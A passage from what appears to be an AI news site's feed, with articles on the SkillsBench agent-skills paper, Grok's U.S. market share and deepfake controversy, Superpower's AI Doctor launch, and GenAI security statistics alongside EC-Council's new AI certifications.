handing someone a medical textbook (the model's training data) and handing them a step-by-step protocol for diagnosing chest pain in an ER (a skill). The textbook contains the information somewhere. The protocol tells you what to do <em>right now</em>, in what order, and what to check.</p> <p>Skills are injected at inference time. No fine-tuning, no model modification - just better prompts backed by domain expertise.</p> <h2 id="the-results">The Results</h2> <p>Here is the full leaderboard from the paper, testing each model with and without curated skills:</p> <table> <thead> <tr> <th>Agent + Model</th> <th>No Skills</th> <th>With Skills</th> <th>Uplift</th> </tr> </thead> <tbody> <tr> <td>Gemini CLI + Gemini 3 Flash</td> <td>31.3%</td> <td><strong>48.7%</strong></td> <td>+17.4 pp</td> </tr> <tr> <td>Claude Code + Opus 4.5</td> <td>22.0%</td> <td>45.3%</td> <td>+23.3 pp</td> </tr> <tr> <td>Codex CLI + GPT-5.2</td> <td>30.6%</td> <td>44.7%</td> <td>+14.1 pp</td> </tr> <tr> <td>Claude Code + Opus 4.6</td> <td>30.6%</td> <td>44.5%</td> <td>+13.9 pp</td> </tr> <tr> <td>Gemini CLI + Gemini 3 Pro</td> <td>27.6%</td> <td>41.2%</td> <td>+13.6 pp</td> </tr> <tr> <td>Claude Code + Sonnet 4.5</td> <td>17.3%</td> <td>31.8%</td> <td>+14.5 pp</td> </tr> <tr> <td>Claude Code + Haiku 4.5</td> <td>11.0%</td> <td>27.7%</td> <td>+16.7 pp</td> </tr> </tbody> </table> <p>Two things jump out immediately.</p> <p>First, <strong>skills matter more than model scale</strong>. Claude Haiku 4.5 - the cheapest, smallest model in Anthropic's lineup - with curated skills (27.7%) comfortably outperforms Claude Opus 4.5 without them (22.0%). That is a model costing roughly a fraction of Opus beating the flagship, simply by having better instructions.</p> <p>Second, <strong>the biggest winner is Gemini 3 Flash</strong> - not the Pro variant. A lighter, cheaper model with the right guidance topped the entire leaderboard at 48.7%.</p> <p>The average uplift across all configurations was +16.2 percentage points. For context, that is the kind of improvement that typically takes a full model generation to achieve.</p> <h2 id="where-skills-matter-most-and-least">Where Skills Matter Most (and Least)</h2> <p>The domain-level breakdown reveals where procedural knowledge is most valuable:</p> <table> <thead> <tr> <th>Domain</th> <th>No Skills</th> <th>With Skills</th> <th>Uplift</th> </tr> </thead> <tbody> <tr> <td>Healthcare</td> <td>34.2%</td> <td>86.1%</td> <td><strong>+51.9 pp</strong></td> </tr> <tr> <td>Manufacturing</td> <td>1.0%</td> <td>42.9%</td> <td><strong>+41.9 pp</strong></td> </tr> <tr> <td>Cybersecurity</td> <td>20.8%</td> <td>44.0%</td> <td>+23.2 pp</td> </tr> <tr> <td>Natural Science</td> <td>23.1%</td> <td>44.9%</td> <td>+21.9 pp</td> </tr> <tr> <td>Energy</td> <td>29.5%</td> <td>47.5%</td> <td>+17.9 pp</td> </tr> <tr> <td>Office &amp; White Collar</td> <td>24.7%</td> <td>42.5%</td> <td>+17.8 pp</td> </tr> <tr> <td>Finance</td> <td>12.5%</td> <td>27.6%</td> <td>+15.1 pp</td> </tr> <tr> <td>Media &amp; Content</td> <td>23.8%</td> <td>37.6%</td> <td>+13.9 pp</td> </tr> <tr> <td>Robotics</td> <td>20.0%</td> <td>27.0%</td> <td>+7.0 pp</td> </tr> <tr> <td>Mathematics</td> <td>41.3%</td> <td>47.3%</td> <td>+6.0 pp</td> </tr> <tr> <td>Software Engineering</td> <td>34.4%</td> <td>38.9%</td> <td>+4.5 pp</td> </tr> </tbody> </table> <p>The pattern is telling. <strong>Healthcare saw the largest gain (+51.9 pp)</strong> - a domain built on rigid protocols, checklists, and decision trees that maps perfectly to structured procedural guidance. Manufacturing, another protocol-heavy field where models have minimal training data, jumped from nearly zero (1.0%) to 42.9%.</p> <p>At the bottom: software engineering (+4.5 pp) and mathematics (+6.0 pp). These are domains where frontier models have seen enormous training data and where reasoning ability matters more than step-by-step protocols. The models already know how to code. They do not already know your hospital's triage workflow.</p> <p>The implication for enterprise AI is significant: the less your domain looks like the internet, the more skills will help.</p> <h2 id="the-self-generation-trap">The Self-Generation Trap</h2> <p>Here is the finding that should concern anyone building autonomous agent systems: <strong>models cannot write their own skills</strong>.</p> <p>When prompted to generate their own procedural guides before attempting tasks, models averaged -1.3 percentage points compared to working without any skills at all. Only Claude Opus 4.6 showed a marginal positive effect (+1.4 pp). Every other model performed worse with self-generated guidance than with none.</p> <p>As <a href="https://news.ycombinator.com/item?id=47040430">Hacker News commenters</a> pointed out, the experimental setup is somewhat artificial - models generated skills &quot;cold&quot; without iterative refinement or feedback from failed attempts. In practice, a human-in-the-loop workflow where skills are refined after failures works better.</p> <p>But the core point stands: the procedural knowledge that makes skills effective is precisely the knowledge models lack. They cannot distill what they do not have. The textbook cannot write the clinical protocol - that requires a clinician who has done the work.</p> <h2 id="compact-beats-comprehensive">Compact Beats Comprehensive</h2> <p>The paper also tested skill design principles and found a counterintuitive result: <strong>less is more</strong>.</p> <ul> <li>2–3 skills per task produced the optimal uplift (+18.6 pp)</li> <li>4+ skills showed diminishing returns (+5.9 pp)</li> <li>Compact, targeted skills (+17.1 pp) outperformed comprehensive documentation (-2.9 pp) by a wide margin</li> </ul> <p>Dumping everything you know into a massive reference document actually <em>hurts</em> agent performance. The models get overwhelmed. Focused, opinionated guides that say &quot;do this, then this, use this specific function&quot; outperform exhaustive wikis by nearly 4x.</p> <p>This tracks with what practitioners have reported anecdotally about prompt engineering: specificity beats thoroughness.</p> <h2 id="a-real-example-flood-risk-analysis">A Real Example: Flood Risk Analysis</h2> <p>The paper highlights a concrete case. In a flood-risk analysis task, agents without skills achieved a 2.9% pass rate - essentially random guessing. After receiving a curated skill specifying the correct statistical methods and relevant scipy functions, success rates jumped to 80%.</p> <p>The skill did not contain the answer. It contained the <em>approach</em> - the domain expert's knowledge of which tools to reach for and in what order. That is the gap between a model that has read every statistics textbook and an analyst who has done flood risk modeling for a decade.</p> <h2 id="openthoughts-tblite-a-faster-coding-benchmark">OpenThoughts-TBLite: A Faster Coding Benchmark</h2> <p>Alongside SkillsBench, the team released <a href="https://www.open-thoughts.ai/">OpenThoughts-TBLite</a>, a streamlined coding benchmark designed to produce meaningful signal for smaller models. Where existing coding benchmarks like SWE-Bench are calibrated for frontier-class models, TBLite creates a more accessible evaluation that lets researchers test whether lightweight models can perform practical terminal-based tasks.</p> <p>The motivation is the same philosophy driving SkillsBench: you do not always need the biggest model. You need the right model with the right guidance, evaluated on the right tasks.</p> <h2 id="what-this-means-for-the-industry">What This Means for the Industry</h2> <p>SkillsBench formalizes what a growing number of AI engineers have been discovering in production: <strong>the bottleneck is not model capability - it is knowledge engineering</strong>.</p> <p>The implications are practical:</p> <p><strong>For teams deploying AI agents:</strong> Invest in building skill libraries. A junior model with good skills beats a senior model without them. The ROI on having domain experts write structured guides is massive - potentially worth more than upgrading to a more expensive model.</p> <p><strong>For model providers:</strong> The leaderboard order changes when you add skills. Gemini 3 Flash beats Opus 4.6. Haiku beats Opus. Raw benchmark scores without skills are an increasingly misleading measure of real-world agent utility.</p> <p><strong>For the &quot;autonomous agent&quot; narrative:</strong> Self-generated skills do not work. The dream of fully autonomous agents that teach themselves new domains is not supported by this data. Human expertise remains the critical ingredient - it just gets expressed differently, as structured procedural guides instead of manual execution.</p> <p><strong>For enterprise buyers:</strong> The most expensive model is not automatically the best choice. A smaller model with domain-specific skills can outperform at a fraction of the cost. The new moat is not which model you use - it is the quality of your skill library.</p> <p>The era of &quot;just use a bigger model&quot; is giving way to something more nuanced: use the right model, give it the right knowledge, and keep the instructions tight. <a href="https://arxiv.org/abs/2602.12670">SkillsBench</a> just proved it with 7,308 trials across 84 tasks.</p> <p>Smart engineering beats brute force. The benchmarks finally show it.</p>Elena MarchettiNewsGrok Reaches 17.8% U.S. Market Share After Nearly 10x Growth in One Yearhttps://awesomeagents.ai/news/grok-17-percent-market-share-us/Sat, 21 Feb 2026 15:42:00 +0100https://awesomeagents.ai/news/grok-17-percent-market-share-us/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Grok's U.S. market share rose to 17.8% in January 2026, up from 1.9% in January 2025 - a roughly 9x increase in twelve months</li> <li>ChatGPT's share fell from 80.9% to 52.9% over the same period, while Gemini grew from 17.3% to 29.4%</li> <li>Grok is now the third most-used AI chatbot in the United States, according to Apptopia data reported by Reuters</li> <li>xAI raised $20 billion in a Series E round in January 2026, valuing the company at $230 billion</li> <li>The growth is attributed primarily to Grok's deep integration with X, not model superiority - raising questions about whether distribution beats benchmarks</li> </ul> </div> <p>Grok, the AI chatbot built by Elon Musk's xAI and embedded into the X social media platform, has reached 17.8% market share in the United States as of January 2026. That is up from 14% in December 2025 and just 1.9% in January 2025, according to <a href="https://apptopia.com/en/blog/gen-ai-chatbots-january-2026-apptopia-data-brief/">data from research firm Apptopia</a> reported by <a href="https://finance.yahoo.com/news/musks-ai-chatbot-groks-us-213957629.html">Reuters</a>.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Grok's U.S. market share rose to 17.8% in January 2026, up from 1.9% in January 2025 - a roughly 9x increase in twelve months</li> <li>ChatGPT's share fell from 80.9% to 52.9% over the same period, while Gemini grew from 17.3% to 29.4%</li> <li>Grok is now the third most-used AI chatbot in the United States, according to Apptopia data reported by Reuters</li> <li>xAI raised $20 billion in a Series E round in January 2026, valuing the company at $230 billion</li> <li>The growth is attributed primarily to Grok's deep integration with X, not model superiority - raising questions about whether distribution beats benchmarks</li> </ul> </div> <p>Grok, the AI chatbot built by Elon Musk's xAI and embedded into the X social media platform, has reached 17.8% market share in the United States as of January 2026. That is up from 14% in December 2025 and just 1.9% in January 2025, according to <a href="https://apptopia.com/en/blog/gen-ai-chatbots-january-2026-apptopia-data-brief/">data from research firm Apptopia</a> reported by <a href="https://finance.yahoo.com/news/musks-ai-chatbot-groks-us-213957629.html">Reuters</a>.</p> <p>The numbers tell a clear story: in twelve months, Grok went from a rounding error to the third-largest AI chatbot in the country, behind only OpenAI's ChatGPT and Google's Gemini.</p> <h2 id="the-full-scoreboard">The Full Scoreboard</h2> <p>The AI chatbot market reshuffled dramatically between January 2025 and January 2026:</p> <table> <thead> <tr> <th>Chatbot</th> <th>Jan 2025</th> <th>Jan 2026</th> <th>Change</th> </tr> </thead> <tbody> <tr> <td>ChatGPT</td> <td>80.9%</td> <td>52.9%</td> <td>-28.0 pp</td> </tr> <tr> <td>Gemini</td> <td>17.3%</td> <td>29.4%</td> <td>+12.1 pp</td> </tr> <tr> <td>Grok</td> <td>1.9%</td> <td>17.8%</td> <td>+15.9 pp</td> </tr> </tbody> </table> <p>ChatGPT's dominance eroded significantly - dropping nearly 28 percentage points - while Gemini and Grok collectively ate into that lead. The overall chatbot market itself grew 152% year-over-year, meaning ChatGPT still saw absolute growth in visits (from 3.8 billion to 5.7 billion monthly), but its grip on the market is loosening fast.</p> <h2 id="distribution-is-the-moat">Distribution Is the Moat</h2> <p>The elephant in the room is <em>why</em> Grok grew this fast. It is not because Grok 3 topped every benchmark. Analysts and industry observers point squarely at distribution.</p> <p>&quot;I suspect that cross-promotion with X is the biggest reason for Grok's growth,&quot; said Nate Elliott, a principal analyst at Emarketer, in <a href="https://finance.yahoo.com/news/musks-ai-chatbot-groks-us-213957629.html">comments to Reuters</a>.</p> <p>X has integrated Grok across the platform in ways that make it nearly impossible to ignore: it sits in the navigation bar, it powers search summaries, and different tiers of premium Grok access are bundled with X's paid subscriptions. With roughly 600 million monthly active users on the platform, even a small conversion rate translates to tens of millions of chatbot interactions.</p> <p>This is the same playbook Google used with Gemini - bake it into Search, Android, and Gmail, and watch adoption follow. The lesson for the AI industry is increasingly clear: when distribution and model quality are both above a threshold, distribution wins.</p> <h2 id="grok-in-x-chat-convenience-vs-privacy">Grok in X Chat: Convenience vs. Privacy</h2> <p>Musk recently promoted Grok's newest integration point - <a href="https://www.ibtimes.co.uk/grok-ai-comes-x-chat-musk-confirms-messages-sent-ai-are-unencrypted-1765219">X Chat</a>. Users can now long-press any message in a direct message conversation and select &quot;Ask Grok&quot; to get analysis, translation, fact-checking, or context.</p> <p>The catch: Musk confirmed that messages sent to Grok are processed using an unencrypted copy. The chats themselves remain private and encrypted, but the specific message shared with Grok exits that encryption layer for analysis.</p> <p>The disclosure raised immediate questions from privacy advocates about data retention policies and whether analyzed messages are used to train xAI's models. X has not publicly addressed those questions.</p> <h2 id="the-money-behind-the-growth">The Money Behind the Growth</h2> <p>xAI's momentum is backed by serious capital. In January 2026, the company <a href="https://x.ai/news/series-e">announced a $20 billion Series E round</a>, exceeding its initial $15 billion target. Investors include Nvidia, Cisco, Fidelity, Qatar Investment Authority, and Valor Equity Partners, valuing xAI at approximately $230 billion.</p> <p>On a standalone basis (excluding X advertising revenue), xAI exited 2025 at roughly a $500 million annualized revenue run rate, driven by SuperGrok subscriptions (<del>$30/month), SuperGrok Heavy (</del>$300/month), and usage-based API pricing.</p> <h2 id="the-controversy-that-didnt-slow-it-down">The Controversy That Didn't Slow It Down</h2> <p>Perhaps the most striking aspect of Grok's rise is that it accelerated <em>during</em> one of the worst PR crises in AI chatbot history.</p> <p>Starting in late December 2025, <a href="https://www.cnbc.com/2026/01/02/musk-grok-ai-bot-safeguard-sexualized-images-children.html">reports emerged</a> that Grok's image generation capabilities could produce sexualized deepfake images, including of minors and non-consenting adults. The backlash was swift and global:</p> <ul> <li>The <a href="https://www.cnn.com/2026/02/17/business/grok-ai-sexualized-images-eu-probe-intl/index.html">EU's data privacy watchdog launched an investigation</a> into X over the generated images</li> <li>The UK's Information Commissioner's Office opened formal investigations into both X and xAI</li> <li>France launched a separate probe</li> <li><a href="https://www.malwarebytes.com/blog/news/2026/02/grok-continues-producing-sexualized-images-after-promised-fixes">Reuters testing</a> found that Grok produced sexualized imagery in response to 45 of 55 controlled prompts even <em>after</em> xAI promised fixes</li> </ul> <p>Despite all of this, Grok's market share jumped from 14% in December to 17.8% in January. The data suggests that for the average consumer, distribution and convenience outweigh regulatory controversy - at least in the short term.</p> <h2 id="what-this-means-for-the-ai-race">What This Means for the AI Race</h2> <p>The Grok story is less about Grok and more about what it reveals about the AI chatbot market in 2026:</p> <p><strong>Distribution is king.</strong> ChatGPT pioneered the category but is losing share to competitors embedded in platforms people already use. Google has Search. Musk has X. OpenAI has partnerships (Microsoft, Apple), but no owned platform with 600 million users.</p> <p><strong>The market is growing, not just reshuffling.</strong> Total chatbot usage grew 152% year-over-year. ChatGPT's absolute numbers are up - its <em>share</em> is down. This is a market expanding fast enough that multiple players can grow simultaneously.</p> <p><strong>Controversy is not a growth inhibitor</strong> - at least not yet. Grok's deepfake scandal generated global headlines and regulatory action, yet its user growth accelerated through the crisis. Whether regulatory fines or platform restrictions eventually bite remains an open question.</p> <p><strong>The $230 billion question:</strong> xAI's valuation implies the market believes Grok's trajectory is sustainable. At $500 million in annualized revenue and 78.5 million monthly active users, the company is valued at roughly 460x revenue. That is a bet on distribution leverage converting into long-term monetization - a bet that worked for Google Search and might work for Grok on X.</p> <p>The AI chatbot market is no longer a one-horse race. It is a distribution war, and Elon Musk showed up with a 600-million-user head start.</p>Elena MarchettiNewsSuperpower Launches Its AI Doctor: 140,000 Lines of Code to Replace Your 15-Minute Checkuphttps://awesomeagents.ai/news/superpower-ai-doctor-launch/Sat, 21 Feb 2026 15:34:00 +0100https://awesomeagents.ai/news/superpower-ai-doctor-launch/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Superpower launched its AI Doctor on February 18 - a health companion built on a proprietary LLM trained with input from functional and integrative physicians</li> <li>The system ingests 100+ biomarkers, symptom history, and wearable data to build a persistent medical profile with lifetime memory</li> <li>247 commits and 140,000 lines of code across months of engineering, per co-founder Max Marchione</li> <li>Membership costs $199/year and includes annual comprehensive blood panel at 2,000+ Quest lab locations</li> <li>The company has raised $34 million across a $30M Series A led by Forerunner Ventures and a $4M pre-seed</li> </ul> </div> <p>&quot;The future is an AI that knows more about your body than any human ever could.&quot; That is not a research paper abstract. It is a <a href="https://x.com/maxmarchione/status/2024592393002205481">tweet from Max Marchione</a>, co-founder and CEO of Superpower, announcing the public launch of what his company calls an AI Doctor - the product of 247 commits, 140,000 lines of code, and months of engineering.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Superpower launched its AI Doctor on February 18 - a health companion built on a proprietary LLM trained with input from functional and integrative physicians</li> <li>The system ingests 100+ biomarkers, symptom history, and wearable data to build a persistent medical profile with lifetime memory</li> <li>247 commits and 140,000 lines of code across months of engineering, per co-founder Max Marchione</li> <li>Membership costs $199/year and includes annual comprehensive blood panel at 2,000+ Quest lab locations</li> <li>The company has raised $34 million across a $30M Series A led by Forerunner Ventures and a $4M pre-seed</li> </ul> </div> <p>&quot;The future is an AI that knows more about your body than any human ever could.&quot; That is not a research paper abstract. It is a <a href="https://x.com/maxmarchione/status/2024592393002205481">tweet from Max Marchione</a>, co-founder and CEO of Superpower, announcing the public launch of what his company calls an AI Doctor - the product of 247 commits, 140,000 lines of code, and months of engineering.</p> <p>The pitch is straightforward: the median physician visit lasts 15.7 minutes. In that window, a doctor must review your history, assess your symptoms, order tests, and prescribe treatment. Superpower's argument is that an AI with perfect memory, 24/7 availability, and access to your complete biomarker history can do the diagnostic reasoning part better - or at least more thoroughly - than a time-constrained human.</p> <p>The product went live on February 18.</p> <h2 id="what-it-actually-does">What It Actually Does</h2> <p>Superpower's AI Doctor is a health companion that sits on top of the company's existing biomarker testing platform. The system ingests three categories of data:</p> <table> <thead> <tr> <th>Data Source</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>Biomarkers</td> <td>100+ markers across 11 health categories (heart, liver, kidney, hormones, metabolic, thyroid, inflammation, nutrients, immune, body composition, DNA)</td> </tr> <tr> <td>Symptom history</td> <td>Every symptom reported, with clinical-level detail: location, quality, onset, aggravating factors, associated symptoms</td> </tr> <tr> <td>Lifestyle data</td> <td>Wearable integrations (Oura, Garmin, CGM devices planned), self-reported diet, exercise, sleep</td> </tr> </tbody> </table> <p>The core differentiator is <strong>persistent memory</strong>. When you report a headache, the system records it with the same specificity a physician would during a clinical encounter - except it never forgets. Months later, when you report another headache, the AI correlates the two events, checks them against your biomarker trends, and surfaces patterns like &quot;every time your ferritin dips below 30, your anxiety spikes two weeks later.&quot;</p> <h3 id="inline-citations-and-visible-reasoning">Inline Citations and Visible Reasoning</h3> <p>The AI Doctor includes two transparency features that distinguish it from a generic chatbot:</p> <ul> <li><strong>Inline citations</strong>: Every claim links directly to the source lab result or previous conversation that supports it. If the AI says your vitamin D is low, you can see which blood draw produced that number.</li> <li><strong>Visible reasoning</strong>: A &quot;Thinking&quot; tab lets you expand the AI's reasoning chain to see how it reached a conclusion, including how it handles missing data.</li> </ul> <h3 id="the-skeptical-companion">The Skeptical Companion</h3> <p>The most unusual feature is what Superpower calls &quot;healthy skepticism.&quot; The AI tracks consistency between what you say you will do and what you actually do. If you tell it you will cut sugar on Monday and report eating cake on Friday, it will flag the contradiction. If you have a history of stating health goals and abandoning them, the AI factors that into its recommendations - effectively telling you it does not believe you will follow through, based on evidence.</p> <h2 id="the-technical-stack">The Technical Stack</h2> <p>Superpower describes its AI Doctor as running on &quot;some of the most capable AI reasoning models available today&quot; - declining to name specific models. The system is built on a proprietary LLM trained with structured input from functional and integrative physicians who review model outputs, score them for accuracy, and retrain weekly.</p> <p>The knowledge base draws from evidence-based medical literature, functional health frameworks, and longevity research from institutions including Oxford, Harvard, and Stanford. The system is updated continuously as new studies are published.</p> <p>The engineering scope, per Marchione's announcement: 247 commits and 140,000 lines of code across months of development.</p> <h3 id="what-it-does-not-do">What It Does Not Do</h3> <p>The AI Doctor does not prescribe medication, does not diagnose conditions, and does not replace a physician for acute or emergency care. It operates in the preventive and analytical space - surfacing patterns, recommending lifestyle adjustments, and flagging when professional intervention is needed. Complex cases are escalated to Superpower's human clinical team.</p> <h2 id="the-business">The Business</h2> <p>Superpower has raised <strong>$34 million</strong> in total funding:</p> <table> <thead> <tr> <th>Round</th> <th>Amount</th> <th>Lead</th> <th>Notable Investors</th> </tr> </thead> <tbody> <tr> <td>Pre-seed</td> <td>$4M</td> <td>Susa Ventures</td> <td>Day One Ventures, Long Journey Ventures, Atman VC</td> </tr> <tr> <td>Series A</td> <td>$30M</td> <td>Forerunner Ventures</td> <td>Winklevoss Capital, Bond Capital, Logan Paul, Steve Aoki, Giannis Antetokounmpo</td> </tr> </tbody> </table> <p>The membership costs <strong>$199/year</strong> ($17/month) and includes:</p> <ul> <li>One annual comprehensive blood panel (100+ biomarkers) at 2,000+ Quest lab locations or via at-home collection</li> <li>Unlimited AI Doctor access</li> <li>Unlimited concierge messaging with human clinical staff (24-hour response on weekdays)</li> <li>Personalized health plans with lifestyle, diet, supplement, and Rx recommendations</li> <li>Biological age calculation and lifetime health tracking</li> </ul> <p>Additional testing (gut microbiome, toxins, cancer screening) is available as add-ons. The service is available in 37+ U.S. states, accepts HSA/FSA payment, and does not bill traditional insurance.</p> <h3 id="the-clinical-team">The Clinical Team</h3> <p>The medical advisory board includes:</p> <ul> <li><strong>Dr. Anant Vinjamoori</strong> - Chief Longevity Officer (Harvard MD &amp; MBA)</li> <li><strong>Dr. Leigh Erin Connealy</strong> - Founder of The Centre for New Medicine</li> <li><strong>Dr. Abe Malkin</strong> - Founder &amp; Medical Director of Concierge MD</li> <li><strong>Dr. Robert Lufkin</strong> - UCLA Medical Professor, NYT bestselling author</li> </ul> <p>Co-founder <strong>Dr. Manoj Arachige</strong> left clinical medicine specifically to build the AI Doctor, writing in a public essay: &quot;I realized traditional medicine couldn't achieve large-scale impact because doctors work within broken systems but cannot fix them.&quot;</p> <h2 id="the-traction">The Traction</h2> <p>Superpower reports over 100,000 members on its waitlist before the AI Doctor launch. The company claims that 63% of members discover early risk factors for diabetes and 70% slow their biological aging speed - numbers that are self-reported and not independently verified.</p> <p>The celebrity investor list (Logan Paul, Steve Aoki, Vanessa Hudgens, Giannis Antetokounmpo) signals the company's growth strategy: influencer-driven consumer health rather than clinical partnerships or insurance integration.</p> <h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2> <h3 id="the-regulatory-question">The Regulatory Question</h3> <p>Superpower carefully avoids the word &quot;diagnosis.&quot; The AI Doctor &quot;surfaces patterns&quot; and &quot;recommends&quot; - language specifically chosen to stay outside FDA regulatory scope for medical devices. As long as the system does not claim to diagnose, treat, or prevent specific diseases, it operates in the wellness category rather than the clinical one. This is a feature, not a bug - but it means the AI's accuracy is not subject to the same validation standards as an actual diagnostic tool.</p> <h3 id="the-evidence-gap">The Evidence Gap</h3> <p>The physician-in-the-loop training process - where doctors review and score AI outputs weekly - is a reasonable approach to clinical accuracy. But Superpower has not published validation studies, accuracy benchmarks, or comparison data against standard clinical decision support systems. The 140,000 lines of code are proprietary. The training methodology is described in marketing terms, not research terms.</p> <h3 id="the-longevity-premium">The Longevity Premium</h3> <p>At $199/year, Superpower is priced for the wellness-conscious consumer who already buys supplements, tracks macros, and wears an Oura ring. The product is explicitly not designed for the people who need healthcare most - those without access, without insurance, without the baseline health literacy to interpret biomarker data. Co-founder Arachige acknowledged this, writing that Superpower will &quot;initially serve the engaged top 10%&quot; before scaling.</p> <hr> <p>Superpower's bet is that the limiting factor in preventive healthcare is not medical knowledge but physician attention. A doctor who sees you for 15 minutes twice a year cannot possibly track every biomarker trend, correlate every symptom pattern, and hold you accountable to every health goal. An AI with perfect memory and unlimited patience theoretically can. Whether that theoretical advantage translates into better health outcomes is a question Superpower will need to answer with data, not commits.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://x.com/maxmarchione/status/2024592393002205481">Max Marchione announcement on X</a></li> <li><a href="https://superpower.com/ai-doctor">Superpower AI Doctor</a></li> <li><a href="https://superpower.com/blog/superpower-ai-a-new-kind-of-health-intelligence">Superpower AI: A New Kind of Health Intelligence - Superpower Blog</a></li> <li><a href="https://manojarachige.substack.com/p/i-quit-medicine-to-build-superpowers">I Quit Medicine to Build Superpower's AI Doctor - Manoj Arachige</a></li> <li><a href="https://www.fiercehealthcare.com/health-tech/new-startup-superpower-scores-30m-launch-personalized-health-testing">Superpower Raises $30M Series A - Fierce Healthcare</a></li> <li><a href="https://superpower.com/series-a">Superpower $30M Series A - Superpower Blog</a></li> <li><a href="https://www.businesswire.com/news/home/20240521159174/en/Superpower-Raises-$4M-Pre-Seed-to-Launch-Preventative-Healthcare-Platform">Superpower Raises $4M Pre-Seed - BusinessWire</a></li> <li><a href="https://theresanaiforthat.com/ai/superpower-ai-doctor/">Superpower AI Doctor - There's an AI for That</a></li> </ul>Elena MarchettiNewsGenAI Traffic Is Up 890% and 87% of Organizations Report AI-Driven Attacks. The Certification Industry Is Scrambling to Catch Up.https://awesomeagents.ai/news/ai-traffic-890-percent-ec-council-certifications/Sat, 21 Feb 2026 15:29:00 +0100https://awesomeagents.ai/news/ai-traffic-890-percent-ec-council-certifications/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Palo Alto Networks measured an <strong>890% surge</strong> in enterprise GenAI traffic in 2024 across 7,051 global customers</li> <li><strong>87% of organizations</strong> reported AI-driven cyberattacks in the past year (SoSafe, 500 security professionals surveyed)</li> <li>GenAI-related data loss incidents <strong>more than doubled</strong>, now representing 14% of all data security events</li> <li>EC-Council launched four AI certifications (AIE, CAIPM, COASP, CRAGE) plus CCISO v4 - the largest portfolio expansion in its 25-year history</li> <li>IDC estimates <strong>$5.5 trillion</strong> in global AI risk exposure; Bain projects <strong>700,000</strong> U.S. workers need AI/cybersecurity reskilling</li> </ul> </div> <p>Two numbers frame the current AI security landscape better than any analyst report. The first: Palo Alto Networks measured an <strong>890% surge in enterprise generative AI traffic</strong> during 2024, based on data from 7,051 global customers. The second: <strong>87% of security professionals</strong> say their organization experienced an AI-driven cyberattack in the past year, according to SoSafe's 2025 Cybercrime Trends survey of 500 practitioners across 10 countries.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Palo Alto Networks measured an <strong>890% surge</strong> in enterprise GenAI traffic in 2024 across 7,051 global customers</li> <li><strong>87% of organizations</strong> reported AI-driven cyberattacks in the past year (SoSafe, 500 security professionals surveyed)</li> <li>GenAI-related data loss incidents <strong>more than doubled</strong>, now representing 14% of all data security events</li> <li>EC-Council launched four AI certifications (AIE, CAIPM, COASP, CRAGE) plus CCISO v4 - the largest portfolio expansion in its 25-year history</li> <li>IDC estimates <strong>$5.5 trillion</strong> in global AI risk exposure; Bain projects <strong>700,000</strong> U.S. workers need AI/cybersecurity reskilling</li> </ul> </div> <p>Two numbers frame the current AI security landscape better than any analyst report. The first: Palo Alto Networks measured an <strong>890% surge in enterprise generative AI traffic</strong> during 2024, based on data from 7,051 global customers. The second: <strong>87% of security professionals</strong> say their organization experienced an AI-driven cyberattack in the past year, according to SoSafe's 2025 Cybercrime Trends survey of 500 practitioners across 10 countries.</p> <p>The gap between those numbers - near-universal AI adoption paired with near-universal AI-powered attacks - defines the problem EC-Council is trying to address with the largest certification portfolio expansion in its 25-year history.</p> <h2 id="the-threat-data">The Threat Data</h2> <h3 id="the-890-figure">The 890% Figure</h3> <p>Palo Alto Networks published its State of Generative AI 2025 report in June, analyzing traffic patterns across its global customer base. The findings went beyond the headline number:</p> <table> <thead> <tr> <th>Metric</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>GenAI traffic increase (2024)</td> <td>890%</td> </tr> <tr> <td>Average GenAI apps per organization</td> <td>66</td> </tr> <tr> <td>High-risk GenAI apps (% of total)</td> <td>10%</td> </tr> <tr> <td>GenAI-related DLP incidents (change)</td> <td>2.5x increase</td> </tr> <tr> <td>GenAI share of all data security incidents</td> <td>14%</td> </tr> <tr> <td>DeepSeek traffic spike (post-R1 launch)</td> <td>1,800% in 2 months</td> </tr> </tbody> </table> <p>The 10% high-risk figure deserves attention. Of the 66 GenAI applications the average organization now manages, roughly seven pose significant security risks - through data exposure, inadequate access controls, or connections to unvetted third-party models. Writing assistance tools represent 34% of total usage, meaning the most common use case - drafting emails, posts, and reports - is also the one most likely to leak sensitive data into external model providers.</p> <p>Shadow AI compounds the problem. Employees deploying AI tools without IT oversight create exposure to sensitive data leakage, regulatory violations, intellectual property loss, and vulnerability to poisoned outputs.</p> <h3 id="the-87-figure">The 87% Figure</h3> <p>SoSafe's survey adds the attack-side perspective. Of 500 global security professionals, 87% confirmed their organization had faced an AI-driven cyberattack. The World Economic Forum's <a href="https://reports.weforum.org/docs/WEF_Global_Cybersecurity_Outlook_2026.pdf">Global Cybersecurity Outlook 2026</a> independently corroborated this, finding that 87% of respondents identified AI-related vulnerabilities as the fastest-growing cyber risk in 2025.</p> <p>The detection problem is worse than the attack problem. Only <strong>26% of security experts</strong> expressed high confidence in their ability to detect AI-driven attacks. Yet <strong>91%</strong> anticipate a significant surge in AI-driven threats over the next three years. The industry sees the wave coming and does not believe it can swim.</p> <h2 id="ec-councils-response">EC-Council's Response</h2> <p>Against this backdrop, EC-Council announced four new AI certifications on February 10, structured around what it calls the <strong>Adopt. Defend. Govern.</strong> framework:</p> <h3 id="the-four-certifications">The Four Certifications</h3> <p><strong>1. Artificial Intelligence Essentials (AIE)</strong> - <em>Adopt</em> Foundational AI literacy for all roles. The baseline credential that establishes common vocabulary and risk awareness across technical and non-technical staff.</p> <p><strong>2. Certified AI Program Manager (CAIPM)</strong> - <em>Adopt</em> Translates AI strategy into execution. Covers team alignment, governance structures, and delivery management for measurable ROI. Targets program managers and business leaders overseeing AI deployments.</p> <p><strong>3. Certified Offensive AI Security Professional (COASP)</strong> - <em>Defend</em> The most technically aggressive of the four. Focuses on testing LLM vulnerabilities, simulating exploits against AI systems, and hardening AI infrastructure. Think <a href="/guides/ai-safety-and-alignment-explained/">red-teaming</a> for AI - prompt injection, data poisoning, model exploitation, and supply chain compromise.</p> <p><strong>4. Certified Responsible 